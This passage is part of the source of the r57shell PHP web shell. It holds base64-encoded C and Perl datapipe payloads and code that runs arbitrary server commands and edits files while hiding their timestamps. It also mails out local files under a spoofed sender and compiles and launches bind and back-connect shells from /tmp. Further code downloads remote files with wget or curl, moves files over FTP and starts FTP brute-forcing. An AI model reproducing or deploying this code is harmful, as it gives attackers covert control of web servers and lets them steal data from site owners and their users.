gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID 0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sI
ElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5 ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXp lb2YobGFkZHIpKSkgew0KICAgIHBlcnJ vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KIC AgIHBlcnJvcigibGlzdGVuIik7DQogIC AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoI mZvcmsiKTsNCiAgICByZXR1cm4gMjA7D QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChj c29jayA9IGFjY2VwdChsc29jaywgJmNh ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICA gIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKS k7DQogICAgICBzaHV0ZG93bihjc29jay wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ie XQgPT0gMCkNCiAgICAgIGdvdG8gZ290c 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5H KSA+IDApOw0KICB9DQogIHJldHVybiAy MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIEl QUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ2 90byBxdWl0MTsNCiAgfQ0KICBvYWRkci 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7D QogIG1lbWNweSgmb2FkZHIuc2luX2FkZ HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXpl b2Yob2FkZHIpKSkgew0KICAgIGZwcmlu dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl 0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZm Rzcik7DQogICAgRkRfU0VUKGNzb2NrLC ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogI CAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6 ICVzXG4iLCBzdHJlcnJvcihlcnJubykp Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCB GRF9JU1NFVChjc29jaywmZmRzZSkpIHs NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQ ogICAgICBpZiAoKHdyaXRlKG9zb2NrLG J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJ mZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290 byBxdWl0MjsNCiAgICAgIGlmICgod3Jp dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0Mjo NCiAgc2h1dGRvd24ob3NvY2ssMik7DQo gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMi k7DQogcXVpdDA6DQogIGZjbG9zZShjZm lsZSk7DQogIHJldHVybiAwOw0KfQ=="; $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2Nhb HBvcnQgPSAkQVJHVlswXTsNCiRob3N0I CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1 bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk 7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdC cgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0Z W4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+
YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZml uZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsIC RudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86O lNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0 aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eyd kaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2 ggfHwgJHRoKSB7DQpteSAkcmluID0gIi I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0a CksIDEpID0gMSBpZiAkdGg7DQpteSgkc m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsN CmlmICghJHJvdXQgICYmICAhJGVvdXQp IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW9 1dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1Zm ZlciwgMTAyNCk7DQppZiAoIWRlZmluZW QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9P SAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRo KSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCB TVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW 50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1Z mZlciwgJGxlbik7DQppZiAoJHJlcyA+I DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAi JCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGx lbik7DQppZiAoJHJlcyA+IDApIHskY2J 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ 0KfX19DQo="; $c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdG gucmFuZG9tKCkrIiZzPTgxNjA2 JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXR pb24uaHJlZik7ZG9jdW1lbnQuY29va2l lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIi k7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yL mphdmFFbmFibGVkKCk/IlkiOiJOIik8L 3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9n X3IrPSImd2g9IitzY3JlZW4ud2lkdGgr J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0 iTWljIikpP3NjcmVlbi5jb2xvckRlcHR oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPm hvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZ W50LndyaXRlKCI8YSBocmVmPSdodHRwO i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9o aXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4 iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly
9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb 3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; $c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ 0KZG9jdW1lbnQud3JpdGUoJzxh IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGl tZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZW VuKT09J3VuZGVmaW5lZCcpPycnOg0KJz tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjc mVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg 7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u 8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0 tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV ybmV0LS0+"; echo $head; echo '</head>'; if(empty($_POST['cmd'])) { $serv = array(127,192,172,10); $addr=@explode('.', $_SERVER['SERVER_ADDR']); $current_version = str_replace('.','',$version); if (!in_array($addr[0], $serv)) { @print "<img src="http://127.0.0.1/r57shell/version.php?img=1&version=". $current_version."" border=0 height=0 width=0>"; @readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}} echo '<body bgcolor="#FFFFFF"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> <tr><td bgcolor=#3A6EA5 width=160><font face=Verdana size=2>'.ws(1).'&nbsp; <font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> </font></td><td bgcolor=#3A6EA5><font face=Verdana size=-2>'; echo ws(2); echo "<b>".date ("d-m-Y H:i:s")."</b>"; echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title="". $lang[$language.'_text46'].""><b>phpinfo</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title="". $lang[$language.'_text47'].""><b>php.ini</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title="". $lang[$language.'_text50'].""><b>cpu</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title="". $lang[$language.'_text51'].""><b>mem</b></a> ".$rb; if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title="". $lang[$language.'_text95'].""><b>users</b></a> ".$rb; } echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title="". $lang[$language.'_text48'].""><b>tmp</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title="". $lang[$language.'_text49'].""><b>delete</b></a> ".$rb."<br>"; echo ws(2); echo (($safe_mode)?("safe_mode: <b><font color=white>ON</font></b>"):("safe_mode: <b><font color=orange>OFF</font></b>")); echo ws(2); echo "PHP version: <b>".@phpversion()."</b>"; $curl_on = @function_exists('curl_version'); echo ws(2); echo "cURL: ".(($curl_on)?("<b><font color=white>ON</font></b>"):("<b><font color=orange>OFF</font></b>")); echo ws(2); echo "MySQL: <b>";
$mysql_on = @function_exists('mysql_connect'); if($mysql_on){ echo "<font color=white>ON</font></b>"; } else { echo "<font color=orange>OFF</font></b>"; } echo ws(2); echo "MSSQL: <b>"; $mssql_on = @function_exists('mssql_connect'); if($mssql_on){echo "<font color=white>ON</font></b>";}else{echo "<font color=orange>OFF</font></b>";} echo ws(2); echo "PostgreSQL: <b>"; $pg_on = @function_exists('pg_connect'); if($pg_on){echo "<font color=white>ON</font></b>";}else{echo "<font color=orange>OFF</font></b>";} echo ws(2); echo "Oracle: <b>"; $ora_on = @function_exists('ocilogon'); if($ora_on){echo "<font color=white>ON</font></b>";}else{echo "<font color=orange>OFF</font></b>";} echo "<br>".ws(2); echo "Disable functions : <b>"; if(''==($df=@ini_get('disable_functions'))){echo "<font color=white>NONE</font></b>";}else{echo "<font color=orange>$df</font></b>";} $free = @diskfreespace($dir); if (!$free) {$free = 0;} $all = @disk_total_space($dir); if (!$all) {$all = 0;} $used = $all-$free; $used_percent = @round(100/($all/$free),2); echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; echo '</font></td></tr><table> <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> <tr><td align=right width=100>'; echo $font; if(!$windows){ echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; echo "</td><td>"; echo "<font face=Verdana size=-2 color=orange><b>"; $uname = ex('uname -a'); echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"): (ws(3).@substr(@php_uname(),0,120)."<br>")); if(!$safe_mode){ $bsd1 = ex('sysctl -n kern.ostype'); $bsd2 = ex('sysctl -n kern.osrelease'); $lin1 = ex('sysctl -n kernel.ostype'); $lin2 = ex('sysctl -n kernel.osrelease'); } if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } else { $sysctl = "-"; } echo ws(3).$sysctl."<br>"; echo ws(3).ex('echo $OSTYPE')."<br>"; echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; $id = ex('id'); echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
echo ws(3).$dir; echo ws(3).'( '.perms(@fileperms($dir)).' )'; echo "</b></font>"; } else { echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1) .'</b></font><br>'; echo "</td><td>"; echo "<font face=Verdana size=-2 color=orange><b>"; echo ws(3).@substr(@php_uname(),0,120)."<br>"; echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; echo ws(3).@get_current_user()."<br>"; echo ws(3).$dir; echo "<br></font>"; } echo "</font>"; echo "</td></tr></table>"; if(empty($c1)||empty($c2)) { die(); } $f = '<br>'; $f .= base64_decode($c1); $f .= base64_decode($c2); if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail") { $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."r n"); mr($language,$res); $_POST['cmd']=""; } if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && ! empty($_POST['loc_file'])) { if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; } else { $filename = @basename($_POST['loc_file']); $filedump = @fread($file,@filesize($_POST['loc_file'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); $attach = array( "name"=>$filename, "type"=>$mime_type, "content"=>$filedump ); if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); mr($language,$res); $_POST['cmd']=""; } } if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") { $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name ''.$_POST['s_mask'].'' | xargs grep -E ''.$_POST['s_text'].'''; }
if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") { switch($_POST['what']) { case 'own': @chown($_POST['param1'],$_POST['param2']); break; case 'grp': @chgrp($_POST['param1'],$_POST['param2']); break; case 'mod': @chmod($_POST['param1'],intval($_POST['param2'], 8)); break; } $_POST['cmd']=""; } if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") { switch($_POST['what']) { case 'file': if($_POST['action'] == "create") { if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } else { fclose($file); $_POST['e_name'] = $_POST['mk_name']; $_POST['cmd']="edit_file"; echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2><b>". $lang[$language.'_text61']."</b></font></div></td></tr></table>"; } } else if($_POST['action'] == "delete") { if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></ table>"; $_POST['cmd']=""; } break; case 'dir': if($_POST['action'] == "create"){ if(mkdir($_POST['mk_name'])) { $_POST['cmd']=""; echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; } else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } } else if($_POST['action'] == "delete"){ if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></ table>";
$_POST['cmd']=""; } break; } } if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) { if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; } else { echo $table_up3; echo $font; echo "<form name=save_file method=post>"; echo ws(3)."<b>".$_POST['e_name']."</b>"; echo "<div align=center><textarea name=e_text cols=121 rows=24>"; echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); fclose($file); echo "</textarea>"; echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; echo "<input type=hidden name=dir value=".$dir.">"; echo "<input type=hidden name=cmd value=save_file>"; echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=" ".$lang[$language.'_butt10']." ">")); echo "</div>"; echo "</font>"; echo "</form>"; echo "</td></tr></table>"; exit(); } } if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") { $mtime = @filemtime($_POST['e_name']); if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } else { if($unix) $_POST['e_text']=@str_replace("rn","n",$_POST['e_text']); @fwrite($file,$_POST['e_text']); @touch($_POST['e_name'],$mtime,$mtime); $_POST['cmd']=""; echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2><b>". $lang[$language.'_text45']."</b></font></div></td></tr></table>"; } } if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) { cf("/tmp/bd.c",$port_bind_bd_c); $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); @unlink("/tmp/bd.c"); $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); $_POST['cmd']="ps -aux | grep bd"; } if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) { cf("/tmp/bdpl",$port_bind_bd_pl); $p2=which("perl"); if(empty($p2)) $p2="perl"; $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
$_POST['cmd']="ps -aux | grep bdpl"; } if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) { cf("/tmp/back",$back_connect); $p2=which("perl"); if(empty($p2)) $p2="perl"; $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); $_POST['cmd']="echo "Now script try connect to ".$_POST['ip']." port ". $_POST['port']." ...""; } if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) { cf("/tmp/back.c",$back_connect_c); $blah = ex("gcc -o /tmp/backc /tmp/back.c"); @unlink("/tmp/back.c"); $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); $_POST['cmd']="echo "Now script try connect to ".$_POST['ip']." port ". $_POST['port']." ...""; } if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && ! empty($_POST['remote_port']) && ($_POST['use']=="Perl")) { cf("/tmp/dp",$datapipe_pl); $p2=which("perl"); if(empty($p2)) $p2="perl"; $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ". $_POST['remote_port']." &"); $_POST['cmd']="ps -aux | grep dp"; } if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && ! empty($_POST['remote_port']) && ($_POST['use']=="C")) { cf("/tmp/dpc.c",$datapipe_c); $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); @unlink("/tmp/dpc.c"); $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ". $_POST['remote_host']." &"); $_POST['cmd']="ps -aux | grep dpc"; } if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} if (!empty($HTTP_POST_FILES['userfile']['name'])) { if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } else { $nfn = $HTTP_POST_FILES['userfile']['name']; } @copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['dir']."/".$nfn) or print("<font color=orange face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); } if (!empty($_POST['with']) && !empty($_POST['rem_file']) && ! empty($_POST['loc_file'])) { switch($_POST['with']) { case wget: $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
break; case fetch: $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ". $_POST['rem_file'].""; break; case lynx: $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ". $_POST['loc_file'].""; break; case links: $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ". $_POST['loc_file'].""; break; case GET: $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; break; case curl: $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; break; } } if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) { list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); if(empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect ($ftp_server,$ftp_port,10); if(!$connection) { fe($language,0); } else { if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); } else { if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?(''):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'], $_POST['loc_file'],$_POST['mode']); } } } @ftp_close($connection); $_POST['cmd'] = ""; } if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") { list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); if(empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect ($ftp_server,$ftp_port,10); if(!$connection) { fe($language,0); $_POST['cmd'] = ""; } else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></ tr></table>"; $_POST['cmd'] = ""; } @ftp_close($connection); } echo $table_up3; if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
